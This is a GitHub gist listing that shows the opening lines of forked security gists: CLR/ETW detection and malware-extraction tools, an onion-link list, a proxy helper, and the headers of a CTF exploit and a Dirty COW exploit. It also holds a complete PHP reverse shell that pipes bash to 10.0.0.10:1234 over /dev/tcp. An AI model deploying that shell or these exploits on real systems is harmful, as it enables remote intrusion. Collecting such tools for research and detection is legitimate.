
Bart Black reanimat0r

@reanimat0r
reanimat0r / dotnet-runtime-etw.py
Created October 24, 2018 19:54 — forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security-relevant events in the CLR via ETW, for detecting malicious assemblies.
import time
import etw
import etw.evntrace
import sys
import argparse
import threading
class RundownDotNetETW(etw.ETW):
    def __init__(self, verbose, high_risk_only):
reanimat0r / Get-LibraryMS.ps1
Created October 24, 2018 19:55 — forked from countercept/Get-LibraryMS.ps1
Checks the %USERPROFILE% directory for any file with the library-ms extension and extracts the CLSID. In particular, the <url> element with a shell command.
function Get-LibraryMS {
<#
.SYNOPSIS
Author: Jayden Zheng (@fuseyjz)
Checks the %USERPROFILE% directory for any file with the library-ms extension and extracts the CLSID.
In particular, the <url> element with a shell command.
Blog: pending release
reanimat0r / Onions.md
Created October 24, 2018 21:14 — forked from maestron/Onions.md
Onion Links, last updated 09/02/2018
reanimat0r / http_proxy_connect.py
Created October 24, 2018 21:15 — forked from frxstrem/http_proxy_connect.py
Establish a socket connection through an HTTP proxy in Python.
'''
Establish a socket connection through an HTTP proxy.
Author: Fredrik Østrem <[email protected]>
License:
This code can be used, modified and distributed freely, as long as this note, containing the original
author, the source and this license, is put along with the source code.
'''
reanimat0r / shell.php
Created October 27, 2018 22:46 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
reanimat0r / exp300.py
Created October 28, 2018 21:08 — forked from mak/exp300.py
Exploit for the "300" challenge at 34c3ctf
import phun
class R(phun.Remote):
    def menu(self):
        self.read('4) free\n')
    def cmd(self,nr,idx):
        self.menu()
        self.sendline(str(nr))
reanimat0r / wcr.py
Created October 28, 2018 21:09 — forked from mak/wcr.py
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
reanimat0r / hdoc.py
Created October 28, 2018 21:09 — forked from mak/hdoc.py
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
reanimat0r / x.sh
Created October 28, 2018 21:10 — forked from mak/x.sh
One-liner to extract the PowerShell command from recent Nymaim documents
( olevba $document | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'
reanimat0r / naughtyc0w.c
Created October 28, 2018 21:10 — forked from mak/naughtyc0w.c
Exploit for CVE-2016-5195, nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>